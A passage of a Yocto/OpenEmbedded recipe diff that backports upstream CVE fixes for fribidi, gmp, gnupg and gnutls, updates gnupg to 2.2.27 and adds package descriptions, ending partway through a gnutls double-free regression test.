++ us[j++] = '?';
++ else
++ us[j++] = caprtl_to_unicode[(int) s[i]];
++ }
+ }
+
+ return j;
diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
+From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 19:06:10 +0900
+Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
+
+Escape from fribidi_remove_bidi_marks() immediately if str is null.
+
+This fixes https://github.com/fribidi/fribidi/issues/183
+
+CVE: CVE-2022-25310
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/fribidi.c b/lib/fribidi.c
+index f5da0da..70bdab2 100644
+--- a/lib/fribidi.c
++++ b/lib/fribidi.c
+@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
+ fribidi_boolean status = false;
+
+ if UNLIKELY
+- (len == 0)
++ (len == 0 || str == NULL)
+ {
+ status = true;
+ goto out;
diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
+DESCRIPTION = "It provides utility functions to aid in the development \
+of interactive editors and widgets that implement BiDi functionality. \
+The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
+as Hebrew, Arabic, Syriac, and Thaana. "
SECTION = "libs"
+HOMEPAGE = "http://fribidi.org/"
+BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
+ file://CVE-2022-25308.patch \
+ file://CVE-2022-25309.patch \
+ file://CVE-2022-25310.patch \
"
SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"
diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Key/value database library with extensible hashing"
+DESCRIPTION = "Library of database functions that use extensible hashing \
+and work similar to the standard UNIX dbm. These routines are provided \
+to a programmer needing to create and manipulate a hashed database."
HOMEPAGE = "http://www.gnu.org/software/gdbm/"
SECTION = "libs"
LICENSE = "GPLv3"
diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2021-43618
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+# HG changeset patch
+# User Marco Bodrato <bodrato@mail.dm.unipi.it>
+# Date 1634836009 -7200
+# Node ID 561a9c25298e17bb01896801ff353546c6923dbd
+# Parent e1fd9db13b475209a864577237ea4b9105b3e96e
+mpz/inp_raw.c: Avoid bit size overflows
+
+diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c
+--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100
++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200
+@@ -88,8 +88,11 @@
+
+ abs_csize = ABS (csize);
+
++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8))
++ return 0; /* Bit size overflows */
++
+ /* round up to a multiple of limbs */
+- abs_xsize = BITS_TO_LIMBS (abs_csize*8);
++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8);
+
+ if (abs_xsize != 0)
+ {
diff --git a/meta/recipes-support/gmp/gmp_6.2.0.bb b/meta/recipes-support/gmp/gmp_6.2.0.bb
index a19c74fca8..d29b74f829 100644
--- a/meta/recipes-support/gmp/gmp_6.2.0.bb
+++ b/meta/recipes-support/gmp/gmp_6.2.0.bb
@@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \
file://use-includedir.patch \
file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \
file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \
+ file://cve-2021-43618.patch \
"
SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21"
SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea"
diff --git a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
index 0defebeb15..19f32e8d1f 100644
--- a/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
+++ b/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb
@@ -1,11 +1,15 @@
SUMMARY = "Test runner for GNOME-style installed tests"
+DESCRIPTION = "Runner provides an execution harness for GNOME installed tests. \
+These tests are useful for verifying the functionality of software as \
+installed and packaged, and complement rather than replace build-time \
+('make check') tests."
HOMEPAGE = "https://wiki.gnome.org/GnomeGoals/InstalledTests"
LICENSE = "LGPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \
file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4"
-SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http"
+SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master"
SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48"
DEPENDS = "glib-2.0"
diff --git a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
index 2c204e0245..a0af2d48dc 100644
--- a/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
+++ b/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch
@@ -1,4 +1,4 @@
-From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001
+From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Mon, 22 Jan 2018 18:00:21 +0200
Subject: [PATCH] configure.ac: use a custom value for the location of
@@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/configure.ac b/configure.ac
-index 919ab31..cd58fdb 100644
+index 64cb8c6..3fe9027 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
+@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf",
AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool])
diff --git a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
index 3e798efd06..a13b4d5fb5 100644
--- a/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
+++ b/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch
@@ -1,7 +1,7 @@
-From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001
+From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001
From: Saul Wold <sgw@linux.intel.com>
Date: Wed, 16 Aug 2017 11:18:01 +0800
-Subject: [PATCH 3/4] dirmngr uses libgpg error
+Subject: [PATCH] dirmngr uses libgpg error
Upstream-Status: Pending
Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
Rebase to 2.1.23
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
---
- dirmngr/Makefile.am | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
+ dirmngr/Makefile.am | 1 +
+ 1 file changed, 1 insertion(+)
diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
-index b404165..d3f916e 100644
+index 00d3c42..450d873 100644
--- a/dirmngr/Makefile.am
+++ b/dirmngr/Makefile.am
-@@ -82,7 +82,8 @@ endif
- dirmngr_LDADD = $(libcommonpth) \
+@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
$(DNSLIBS) $(LIBASSUAN_LIBS) \
$(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
-- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV)
-+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \
-+ $(GPG_ERROR_LIBS)
+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
++ $(GPG_ERROR_LIBS) \
+ $(dirmngr_robj)
if USE_LDAP
dirmngr_LDADD += $(ldaplibs)
- endif
---
-1.8.3.1
-
diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
+From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 22 Jul 2022 17:52:36 +0530
+Subject: [PATCH] CVE-2022-34903
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
+CVE: CVE-2022-34903
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ g10/cpr.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/g10/cpr.c b/g10/cpr.c
+index d502e8b..bc4b715 100644
+--- a/g10/cpr.c
++++ b/g10/cpr.c
+@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
+ }
+ first = 0;
+ }
+- for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
++ for (esc=0, s=buffer, n=len; n; s++, n--)
+ {
+ if (*s == '%' || *(const byte*)s <= lower_limit
+ || *(const byte*)s == 127 )
+ esc = 1;
+ if (wrap && ++count > wrap)
+- {
+- dowrap=1;
+- break;
+- }
+- }
+- if (esc)
+- {
+- s--; n++;
++ dowrap=1;
++ if (esc || dowrap)
++ break;
+ }
+ if (s != buffer)
+ es_fwrite (buffer, s-buffer, 1, statusfp);
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
-From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001
+From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Wed, 19 Sep 2018 14:44:40 +0100
Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/common/homedir.c b/common/homedir.c
-index e9e75d0..19140aa 100644
+index 4b6e46e..58989b4 100644
--- a/common/homedir.c
+++ b/common/homedir.c
-@@ -760,7 +760,7 @@ gnupg_socketdir (void)
+@@ -763,7 +763,7 @@ gnupg_socketdir (void)
if (!name)
{
unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
}
return name;
-@@ -786,7 +786,7 @@ gnupg_sysconfdir (void)
+@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
}
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -815,7 +815,7 @@ gnupg_bindir (void)
+@@ -818,7 +818,7 @@ gnupg_bindir (void)
else
return rdir;
#else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -828,7 +828,7 @@ gnupg_libexecdir (void)
+@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
#ifdef HAVE_W32_SYSTEM
return gnupg_bindir ();
#else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -842,7 +842,7 @@ gnupg_libdir (void)
+@@ -845,7 +845,7 @@ gnupg_libdir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -856,7 +856,7 @@ gnupg_datadir (void)
+@@ -859,7 +859,7 @@ gnupg_datadir (void)
name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -872,7 +872,7 @@ gnupg_localedir (void)
+@@ -875,7 +875,7 @@ gnupg_localedir (void)
NULL);
return name;
#else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
#endif /*!HAVE_W32_SYSTEM*/
}
-@@ -940,7 +940,7 @@ gnupg_cachedir (void)
+@@ -943,7 +943,7 @@ gnupg_cachedir (void)
}
return dir;
#else /*!HAVE_W32_SYSTEM*/
diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
+DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
+as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
+and sign your data and communications; it features a versatile key \
+management system, along with access modules for all kinds of public \
+key directories."
HOMEPAGE = "http://www.gnupg.org/"
LICENSE = "GPLv3 & LGPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://0003-dirmngr-uses-libgpg-error.patch \
file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
+ file://CVE-2022-34903.patch \
"
SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
file://relocate.patch"
SRC_URI_append_class-nativesdk = " file://relocate.patch"
-SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1"
-SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
+SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
EXTRA_OECONF = "--disable-ldap \
--disable-ccid-driver \
--with-zlib=${STAGING_LIBDIR}/.. \
--with-bzip2=${STAGING_LIBDIR}/.. \
--with-readline=${STAGING_LIBDIR}/.. \
+ --with-mailprog=${sbindir}/sendmail \
--enable-gpg-is-gpg2 \
"
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
+From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:32 +0100
+Subject: [PATCH] key_share: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/key_share.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
+index ab8abf8fe6..a8c4bb5cff 100644
+--- a/lib/ext/key_share.c
++++ b/lib/ext/key_share.c
+@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
+ {
+ unsigned i;
+ int ret;
+- unsigned char *lengthp;
+- unsigned int cur_length;
+ unsigned int generated = 0;
+ const gnutls_group_entry_st *group;
+ const version_entry_st *ver;
+
+ /* this extension is only being sent on client side */
+ if (session->security_parameters.entity == GNUTLS_CLIENT) {
++ unsigned int length_pos;
++
+ ver = _gnutls_version_max(session);
+ if (unlikely(ver == NULL || ver->key_shares == 0))
+ return 0;
+@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
+ if (!have_creds_for_tls13(session))
+ return 0;
+
+- /* write the total length later */
+- lengthp = &extdata->data[extdata->length];
++ length_pos = extdata->length;
+
+ ret =
+ _gnutls_buffer_append_prefix(extdata, 16, 0);
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- cur_length = extdata->length;
+-
+ if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
+ group = get_group(session);
+ if (unlikely(group == NULL))
+@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
+ }
+
+ /* copy actual length */
+- _gnutls_write_uint16(extdata->length - cur_length, lengthp);
++ _gnutls_write_uint16(extdata->length - length_pos - 2,
++ &extdata->data[length_pos]);
+
+ } else { /* server */
+ ver = get_version(session);
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
+From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:50 +0100
+Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
+Upstream-Status: Backport
+CVE: CVE-2021-CVE-2021-20232
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/pre_shared_key.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
+index a042c6488e..380bf39ed5 100644
+--- a/lib/ext/pre_shared_key.c
++++ b/lib/ext/pre_shared_key.c
+@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
+ size_t spos;
+ gnutls_datum_t username = {NULL, 0};
+ gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
+- gnutls_datum_t client_hello;
++ unsigned client_hello_len;
+ unsigned next_idx;
+ const mac_entry_st *prf_res = NULL;
+ const mac_entry_st *prf_psk = NULL;
+@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
+ assert(extdata->length >= sizeof(mbuffer_st));
+ assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
+ ext_offset -= sizeof(mbuffer_st);
+- client_hello.data = extdata->data+sizeof(mbuffer_st);
+- client_hello.size = extdata->length-sizeof(mbuffer_st);
++ client_hello_len = extdata->length-sizeof(mbuffer_st);
+
+ next_idx = 0;
+
+@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_res && rkey.size > 0) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_res,
+ binders_len, binders_pos,
+ ext_offset, &rkey, &client_hello, 1,
+@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
+ }
+
+ if (prf_psk && user_key.size > 0 && info) {
++ gnutls_datum_t client_hello;
++
++ client_hello.data = extdata->data+sizeof(mbuffer_st);
++ client_hello.size = client_hello_len;
++
+ ret = compute_psk_binder(session, prf_psk,
+ binders_len, binders_pos,
+ ext_offset, &user_key, &client_hello, 0,
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
+From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 22 Dec 2021 09:12:25 +0100
+Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
+ input
+
+As Nettle's hash update functions internally call memcpy, providing
+zero-length input may cause undefined behavior.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
+Upstream-Status: Backport
+CVE: CVE-2021-4209
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/nettle/mac.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
+index f9d4d7a8df..35e070fab0 100644
+--- a/lib/nettle/mac.c
++++ b/lib/nettle/mac.c
+@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
+ if (ret < 0)
+ return gnutls_assert_val(ret);
+
+- ctx.update(&ctx, text_size, text);
++ if (text_size > 0) {
++ ctx.update(&ctx, text_size, text);
++ }
+ ctx.digest(&ctx, ctx.length, digest);
+
+ return 0;
+--
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
+From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 12:23:14 +0530
+Subject: [PATCH] CVE-2022-2509
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
+CVE: CVE-2022-2509
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ NEWS | 4 +
+ lib/x509/pkcs7.c | 3 +-
+ tests/Makefile.am | 2 +-
+ tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
+ 4 files changed, 222 insertions(+), 2 deletions(-)
+ create mode 100644 tests/pkcs7-verify-double-free.c
+
+diff --git a/NEWS b/NEWS
+index 755a67c..ba70bb3 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ See the end for copying conditions.
+
+ * Version 3.6.14 (released 2020-06-03)
+
++** libgnutls: Fixed double free during verification of pkcs7 signatures.
++ Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
++ [CVE-2022-2509]
++
+ ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
+ The TLS server would not bind the session ticket encryption key with a
+ value supplied by the application until the initial key rotation, allowing
+diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
+index 98669e8..ccbc69d 100644
+--- a/lib/x509/pkcs7.c
++++ b/lib/x509/pkcs7.c
+@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
+ issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
+
+ if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
+- if (prev) gnutls_x509_crt_deinit(prev);
++ if (prev && prev != signer)
++ gnutls_x509_crt_deinit(prev);
+ prev = issuer;
+ break;
+ }
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index 11a083c..cd43a0f 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
+ tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
+ sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
+ tls13-without-timeout-func buffer status-request-revoked \
+- set_x509_ocsp_multi_cli kdf-api keylog-func \
++ set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
+ dtls_hello_random_value tls_hello_random_value x509cert-dntypes
+
+ if HAVE_SECCOMP_TESTS
+diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
+new file mode 100644
+index 0000000..fadf307
+--- /dev/null
++++ b/tests/pkcs7-verify-double-free.c
+@@ -0,0 +1,215 @@
++/*
++ * Copyright (C) 2022 Red Hat, Inc.
++ *
++ * Author: Zoltan Fridrich
++ *
++ * This file is part of GnuTLS.
++ *
++ * GnuTLS is free software: you can redistribute it and/or modify it
++ * under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GnuTLS is distributed in the hope that it will be useful, but
++ * WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
++ */
++
++#ifdef HAVE_CONFIG_H
++#include <config.h>
++#endif
++
++#include <stdio.h>
++#include <gnutls/pkcs7.h>
++#include <gnutls/x509.h>
++
++#include "utils.h"
++
++static char rca_pem[] =
++ "-----BEGIN CERTIFICATE-----\n"
++ "MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++ "cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
++ "VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
++ "v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
++ "v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
++ "ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
++ "t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
++ "/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
++ "5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
++ "DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
